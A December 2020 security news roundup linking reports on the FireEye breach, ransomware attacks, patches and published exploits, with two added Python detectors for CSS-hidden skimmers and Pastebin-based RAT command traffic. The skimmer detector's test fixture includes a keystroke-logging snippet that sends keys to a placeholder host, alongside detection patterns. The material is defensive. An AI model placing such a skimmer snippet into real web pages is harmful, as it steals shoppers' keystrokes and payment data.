OSINT News - December 14, by Bart Otten

in Security

Trickbot trojan, poor security led to FireEye intrusion: claims

https://www.itwire.com/security/trickbot-trojan,-poor-security-led-to-fireeye-intrusion-claims.html 

iTWire - Trickbot trojan, poor security led to FireEye intrusion: claims

11 Dec 2020

www.itwire.com

---

Unauthorized Access of FireEye Red Team Tools

https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html 

Unauthorized Access of FireEye Red Team Tools | FireEye Inc

Overview. A highly sophisticated state-sponsored adversary stole FireEye Red Team tools. Because we believe that an adversary possesses these tools, and we do not know whether the attacker intends to use the stolen tools themselves or publicly disclose them, FireEye is releasing hundreds of countermeasures with this blog post to enable the broader security community to protect themselves ...

www.fireeye.com

---

Taking Action Against Hackers in Bangladesh and Vietnam

https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/ 

Taking Action Against Hackers in Bangladesh and Vietnam - About Facebook

Today, we’re sharing actions we took against two separate groups of hackers — APT32 in Vietnam and a group based in Bangladesh — removing their ability to use their infrastructure to abuse our platform, distribute malware and hack people’s accounts across the internet.

about.fb.com

---

Operation StealthyTrident: corporate software under attack

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ 

Operation StealthyTrident: corporate software under attack | WeLiveSecurity

LuckyMouse, TA428, HyperBro, Tmanger and ShadowPad linked in the Mongolian supply-chain attack Operation StealthyTrident.

www.welivesecurity.com

---

[PDF] From Zero to Sixty The Story of North Korea’s Rapid Ascent to Becoming a Global Cyber Superpower

https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf 

---

US Cyber Command and Australian IWD to develop shared cyber training range

https://securityaffairs.co/wordpress/111988/cyber-warfare-2/us-cyber-command-iwd-cyber-range.html 

US Cyber Command and Australian IWD to develop shared cyber training range--Security Affairs

US Cyber Command and the Information Warfare Division (IWD) of the Australian Defence Force will develop a virtual cyber training platform.

The United States and Australia have signed a first-ever cyber agreement to develop a virtual cyber training platform; the project will be designed by U.S. Cyber Command (USCYBERCOM) and the Information Warfare Division […]

securityaffairs.co

---

OpenSSL is affected by a ‘High Severity’ security flaw, update it now

https://securityaffairs.co/wordpress/112085/security/openssl-tls-ssl-toolkit-flaw.html 

OpenSSL is affected by a ‘High Severity’ security flaw, update it now--Security Affairs

The OpenSSL Project warned of a ‘high-severity’ security vulnerability in the TLS/SSL toolkit that exposes users to denial-of-service (DoS) attacks. The flaw is a null pointer dereference; successful exploitation could trigger denial-of-service conditions ...

securityaffairs.co

---

Foxconn electronics giant hit by ransomware, $34 million ransom

https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/ 

Foxconn electronics giant hit by ransomware, $34 million ransom

Foxconn electronics giant suffered a ransomware attack at a Mexican facility over the Thanksgiving weekend, where attackers stole unencrypted files before encrypting devices. Foxconn is the ...

www.bleepingcomputer.com

---

LockBit Ransomware operators hit Swiss helicopter maker Kopter

https://securityaffairs.co/wordpress/111998/cyber-crime/lockbit-ransomware-kopter.html 

LockBit Ransomware operators hit Swiss helicopter maker Kopter--Security Affairs

LockBit ransomware operators have compromised the systems of the helicopter maker Kopter and published data taken from them on their dark web leak site.

The helicopter maker Kopter was hit by LockBit ransomware; the attackers compromised its internal network and encrypted the company’s files. Kopter Group is a Switzerland-based company founded in 2007 and acquired by Leonardo in April […]

securityaffairs.co

---

Attack on Vermont Medical Center is costing the hospital $1.5M a day

https://securityaffairs.co/wordpress/112133/hacking/vermont-medical-center-cyberattack.html 

Attack on Vermont Medical Center is costing the hospital $1.5M a day--Security Affairs

The attack that hit the University of Vermont Medical Center at the end of October is costing the hospital about $1.5 million a day.

In October, ransomware operators hit the Wyckoff Heights Medical Center in Brooklyn and the University of Vermont Health Network. The ransomware attack took place on October 28 and disrupted services at the UVM Medical Center […]

securityaffairs.co

---

More than 20 million Gionee phones secretly implanted with Trojan Horses to make money

https://www.gizmochina.com/2020/12/05/more-than-20-million-gionee-phones-secretly-implanted-with-trojan-horses-to-make-money/ 

More than 20 million Gionee phones secretly implanted with Trojan Horses to make money - Gizmochina

Recently, the China Judgment Document Network published a verdict in a case of illegal control of computer information systems that was found to have been carried out on Gionee phones. According to the court ...

www.gizmochina.com

---

Expert published PoC exploit code for Kerberos Bronze Bit attack

https://securityaffairs.co/wordpress/112156/hacking/kerberos-bronze-bit-attack.html 

Expert published PoC exploit code for Kerberos Bronze Bit attack--Security Affairs

The proof-of-concept exploit code for the Kerberos Bronze Bit attack was published online; it allows intruders to bypass authentication and access sensitive network services.

The proof-of-concept exploit code for the Kerberos Bronze Bit attack, tracked as CVE-2020-17049, was published online this week. The hacking technique could be exploited by attackers to bypass the Kerberos authentication […]

securityaffairs.co

---

Finnish customs take down sipulimarket on the dark web with Europol support

https://www.europol.europa.eu/newsroom/news/finnish-customs-take-down-sipulimarket-dark-web-europol-support 

Finnish Customs take down Sipulimarket on the dark web with Europol support | Europol

Today the Finnish Customs (Tulli) have shut down the Sipulimarket dark web marketplace and seized all its content. This latest hit against the dark web was done in close cooperation with the Polish Provincial Police Headquarters in Wroclaw (Komenda Wojewódzka Policji we Wroclawiu) and Europol’s European Cybercrime Centre (EC3) and Eurojust.

www.europol.europa.eu

---

Alert (AA20-345A) Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data

https://us-cert.cisa.gov/ncas/alerts/aa20-345a 

Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data | CISA

This Joint Cybersecurity Advisory was coauthored by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC).

us-cert.cisa.gov

---

Cyberattack on the European Medicines Agency

https://www.ema.europa.eu/en/news/cyberattack-european-medicines-agency 

Cyberattack on the European Medicines Agency | European Medicines Agency - ema.europa.eu

www.ema.europa.eu

---

"Important, Spoofing" - zero-click, wormable, cross-platform remote code execution in Microsoft Teams

https://github.com/oskarsve/ms-teams-rce 

GitHub - oskarsve/ms-teams-rce

Below is the original bug report sent to MSRC. Summary: A Remote Code Execution vulnerability has been identified in MS Teams desktop which can be triggered by a novel XSS (Cross-Site Scripting) injection in teams.microsoft.com.

github.com

---

Crooks hide software skimmer inside CSS files

https://securityaffairs.co/wordpress/112117/malware/skimmer-inside-css-files.html 

hackers hide the software skimmer inside CSS files--Security Affairs

The code used by the attackers is a common keystroke logger; since the company disclosed its discovery, the code has been taken offline. “We found a handful of victim stores with this injection method,” SanSec founder Willem de Groot told ZDNet. “However, the infrastructure has been in place since September and was previously used for several dozen more traditional attacks.

securityaffairs.co
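A check a practitioner would want after reading this item, added here as an example and not taken from the Security Affairs article or from Sansec's research: a small Python scanner that looks inside a stylesheet for content that has no business in CSS, namely JavaScript-like tokens (a keystroke logger needs DOM access, an event handler and a way to exfiltrate) and an @import that pulls from a third-party host. The CSS samples, the host names and the own_hosts allowlist are all constructed for the illustration; a legitimate base64 font in a data URI is included to show the heuristic does not fire on it.

```python
import re

# Script-like tokens that do not occur in legitimate CSS: DOM access,
# decoders, network calls and the keyboard/submit handlers a skimmer needs.
JS_TOKEN_RE = re.compile(
    r"\b(?:document|window|navigator)\.\w+"
    r"|\b(?:eval|atob|fetch|unescape)\s*\("
    r"|fromCharCode|XMLHttpRequest|addEventListener"
    r"|\bon(?:keyup|keydown|keypress|submit)\s*="
    r"|<script",
    re.IGNORECASE,
)

# @import that pulls a stylesheet from another host (scheme-relative or absolute).
REMOTE_IMPORT_RE = re.compile(
    r"@import\s+(?:url\()?[\"']?(?:https?:)?//([^/\"')\s]+)", re.IGNORECASE
)


def scan_css(css_text, own_hosts=()):
    """Return a list of human-readable findings for one stylesheet.

    own_hosts is an assumed, site-specific allowlist of hosts the site is
    expected to import stylesheets from; any other import host is reported.
    """
    findings = []
    allowed = {h.lower() for h in own_hosts}
    for m in REMOTE_IMPORT_RE.finditer(css_text):
        host = m.group(1).lower()
        if host not in allowed:
            findings.append(f"@import from third-party host {host}")
    # Comments are scanned too: an injected payload can be parked inside a
    # comment for a separate loader to extract, so it never has to be valid CSS.
    for m in JS_TOKEN_RE.finditer(css_text):
        findings.append(f"JavaScript-like token {m.group(0)!r} at offset {m.start()}")
    return findings


# Constructed samples (not real stylesheets from any compromised store).
BENIGN_CSS = """\
@import url("/css/fonts.css");
@font-face { font-family: "Body"; src: url(data:font/woff2;base64,d09GMgABAAAAAAQoAA0AAAAAC) format("woff2"); }
.document-title { font-weight: 600; }
.window-frame::before { content: "\\201C"; }
"""

MALICIOUS_CSS = """\
.hero { background: #fff; }
/* var f=document.getElementById('cc');f.addEventListener('keyup',function(e){
   fetch('https://example.invalid/c?d='+btoa(e.key));}); */
@import url("//example.invalid/x.css");
"""

if __name__ == "__main__":
    for name, css in (("benign", BENIGN_CSS), ("malicious", MALICIOUS_CSS)):
        print(name, scan_css(css, own_hosts=("shop.example",)) or "clean")
```

The allowlist matters: a store that legitimately imports a font stylesheet from a CDN will trip the @import rule until that host is added to own_hosts, so treat the import finding as a change-detection signal and the token findings as the stronger indicator.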

 

---

Interview with Massimiliano Brolli, Head of TIM Red Team Research

https://securityaffairs.co/wordpress/112190/security/massimiliano-brolli-tim-read-team-interview.html 

Interview with Massimiliano Brolli, Head of TIM Red Team Research--Security Affairs

Interview with Massimiliano Brolli, Head of TIM Red Team Research, a team of experts that focuses on zero-day hunting. For some time now we have been witnessing a series of previously undocumented vulnerabilities disclosed by a TIM IT Security laboratory called Red Team Research (RTR), which already has 31 new CVEs to its name in about a year.

securityaffairs.co

---

njRAT RAT operators leverage Pastebin C2 tunnels to avoid detection

https://securityaffairs.co/wordpress/112147/cyber-crime/njrat-rat-pastebin-c2.html 

njRAT RAT operators leverage Pastebin C2 tunnels to avoid detection--Security Affairs

Threat actors behind the njRAT Remote Access Trojan (RAT) are leveraging active Pastebin Command and Control tunnels to avoid detection.

Researchers from Palo Alto Networks’ Unit 42 reported that operators behind the njRAT Remote Access Trojan (RAT), aka Bladabindi, are leveraging Pastebin Command and Control tunnels to avoid detection. “In observations collected since October 2020, […]

securityaffairs.co
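Added here as an example, not code from the Security Affairs article or from Unit 42: a Python detection heuristic for the behaviour described above, run over constructed web-access log lines. The log format (timestamp, client IP, originating process, user agent, method, URL, as an endpoint agent might record it), the process names, IPs and paste IDs are all invented for the illustration. It flags fetches of Pastebin raw-paste URLs that come from a non-browser process or user agent, and repeated fetches of the same paste from one host, which is what a RAT polling a paste for its configuration looks like.

```python
import re
from collections import defaultdict

# One line per request: ts client_ip process "user_agent" method url
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<proc>\S+) "(?P<ua>[^"]*)" (?P<method>\S+) (?P<url>\S+)$'
)
# Raw paste endpoint: what a downloader fetches. A person in a browser
# normally loads the HTML paste page instead.
RAW_PASTE_RE = re.compile(r"^https?://(?:www\.)?pastebin\.com/raw/(?P<paste>[A-Za-z0-9]+)")
BROWSER_UA_RE = re.compile(r"(?:Chrome|Firefox|Safari|Edg)/\d")
BROWSER_PROCS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}


def parse_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    return [m.groupdict() for m in (LINE_RE.match(line) for line in text.splitlines()) if m]


def find_pastebin_c2(text, min_repeats=3):
    """Return {(client_ip, paste_id): [reasons]} for suspicious raw-paste fetches."""
    reasons = defaultdict(set)
    counts = defaultdict(int)
    for ev in parse_log(text):
        m = RAW_PASTE_RE.match(ev["url"])
        if not m:
            continue
        key = (ev["ip"], m.group("paste"))
        counts[key] += 1
        if not BROWSER_UA_RE.search(ev["ua"]):
            reasons[key].add("non-browser user agent")
        if ev["proc"].lower() not in BROWSER_PROCS:
            reasons[key].add(f"non-browser process {ev['proc']}")
    # Repeated fetches of one paste from one host: polling for C2 instructions.
    for key, n in counts.items():
        if n >= min_repeats:
            reasons[key].add(f"same paste fetched {n} times (polling)")
    return {k: sorted(v) for k, v in reasons.items()}


# Constructed sample log (not real traffic). Host 10.0.0.42 polls one raw
# paste from a non-browser process; 10.0.0.7 views the same paste in Firefox.
SAMPLE_LOG = """\
2020-12-11T09:00:01Z 10.0.0.21 chrome.exe "Mozilla/5.0 (Windows NT 10.0) Chrome/87.0" GET https://pastebin.com/Kq9xZ2
2020-12-11T09:00:05Z 10.0.0.42 svchost.exe "Mozilla/4.0 (compatible; MSIE 6.0)" GET https://pastebin.com/raw/Kq9xZ2
2020-12-11T09:01:05Z 10.0.0.42 svchost.exe "Mozilla/4.0 (compatible; MSIE 6.0)" GET https://pastebin.com/raw/Kq9xZ2
2020-12-11T09:02:05Z 10.0.0.42 svchost.exe "Mozilla/4.0 (compatible; MSIE 6.0)" GET https://pastebin.com/raw/Kq9xZ2
2020-12-11T09:03:00Z 10.0.0.7 firefox.exe "Mozilla/5.0 (X11; Linux x86_64) Firefox/84.0" GET https://pastebin.com/raw/Kq9xZ2
2020-12-11T09:03:30Z 10.0.0.42 svchost.exe "Mozilla/4.0 (compatible; MSIE 6.0)" GET https://example.org/index.html
"""

if __name__ == "__main__":
    for key, why in find_pastebin_c2(SAMPLE_LOG).items():
        print(key, "->", "; ".join(why))
```

A single raw-paste fetch from a scripted client is weak evidence on its own (build tooling and monitoring scripts do it too); the combination of a non-browser origin with repeated fetches of the same paste is what is worth an alert, and the same logic applies to any paste or text-sharing site used as a C2 intermediary.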

 

---

Watchcom discovers new Cisco Jabber vulnerabilities

https://watchcom.no/nyheter/nyhetsarkiv/cisco-jabber-vulnerabilities-resurface/ 

Cisco Jabber vulnerabilities resurface

watchcom.no

---

Unauthenticated Command Injection bug opens D-Link VPN routers to hack

https://securityaffairs.co/wordpress/112077/hacking/d-link-vpn-routers-flaws.html 

Unauthenticated Command Injection bug opens D-Link routers to hack--Security Affairs

An unauthenticated command injection vulnerability could be exploited by threat actors to compromise D-Link VPN routers.

Security researchers at Digital Defense discovered three vulnerabilities in D-Link VPN routers, including command injection flaws and an authenticated crontab injection flaw. The experts initially discovered the flaws in the DSR-250 router family running firmware version 3.17 ...

securityaffairs.co

---

Critical remote code execution fixed in PlayStation Now

https://securityaffairs.co/wordpress/112049/hacking/playstation-now-rce.html 

Critical remote code execution fixed in PlayStation Now--Security Affairs

The bugs affected PS Now version 11.0.2 and earlier on systems running Windows 7 SP1 or later. Since its launch in 2014, PlayStation Now had reached more than 2.2 million subscribers [PDF] by the end of April 2020. Hakimian reported the bugs to Sony on May 13, 2020, through PlayStation’s official bug bounty program, operated via the bug bounty platform HackerOne.

securityaffairs.co

---

QNAP fixed eight flaws that could allow NAS devices takeover

https://securityaffairs.co/wordpress/112041/security/qnap-nas-flaws.html 

QNAP fixed eight flaws that could allow NAS devices takeover--Security Affairs

The list of vulnerabilities addressed by QNAP is available here; it includes XSS and command injection issues. The flaws fixed by the vendor are rated medium and high severity. The high-severity vulnerabilities tracked as CVE-2020-2495, CVE-2020-2496, CVE-2020-2497, and CVE-2020-2498 are cross-site scripting flaws that could allow remote attackers to inject malicious code in File ...

securityaffairs.co

---

Cisco fixes exploitable RCEs in Cisco Security Manager

https://securityaffairs.co/wordpress/112023/security/cisco-security-manager-flaws.html 

Cisco fixes exploitable RCEs in Cisco Security Manager--Security Affairs

These flaws impact CSM releases 4.22 and earlier. The IT firm addressed two of the 12 vulnerabilities, tracked as CVE-2020-27125 and CVE-2020-27130. “A vulnerability in Cisco Security Manager could allow an unauthenticated, remote attacker to access sensitive information on an affected system.” reads the description for CVE-2020-27125. “The vulnerability is due to insufficient protection ...

securityaffairs.co

---

Samsung fixes critical Android bugs in December 2020 updates

https://www.bleepingcomputer.com/news/security/samsung-fixes-critical-android-bugs-in-december-2020-updates/ 

Samsung fixes critical Android bugs in December 2020 updates

This week Samsung has started rolling out Android's December security updates to mobile devices to patch critical security vulnerabilities in the operating system. This comes after Android had ...

www.bleepingcomputer.com

---

Russian Alexander Vinnik sentenced in Paris to five years in prison for money laundering

https://securityaffairs.co/wordpress/112074/cyber-crime/alexander-vinnik-sentence-france.html 

Russian Alexander Vinnik sentenced in Paris to five years in prison--Security Affairs

The man went on trial in Paris for having defrauded nearly 200 victims across the world of 135M euros using ransomware. Alexander Vinnik allegedly headed the Bitcoin exchange BTC-e; he faces various hacking charges in Russia, France, and the United States. The French court acquitted Vinnik of the charges of extortion and association with a cybercrime organization.

securityaffairs.co

---

Individual Pleads Guilty to Participating in Internet-of-Things Cyberattack in 2016

https://www.justice.gov/opa/pr/individual-pleads-guilty-participating-internet-things-cyberattack-2016 

Individual Pleads Guilty to Participating in Internet-of-Things Cyberattack in 2016 | OPA | Department of Justice

An individual, formerly a juvenile, pleaded guilty to committing acts of federal juvenile delinquency in relation to a cyberattack that caused massive disruption to the Internet in October 2016.

www.justice.gov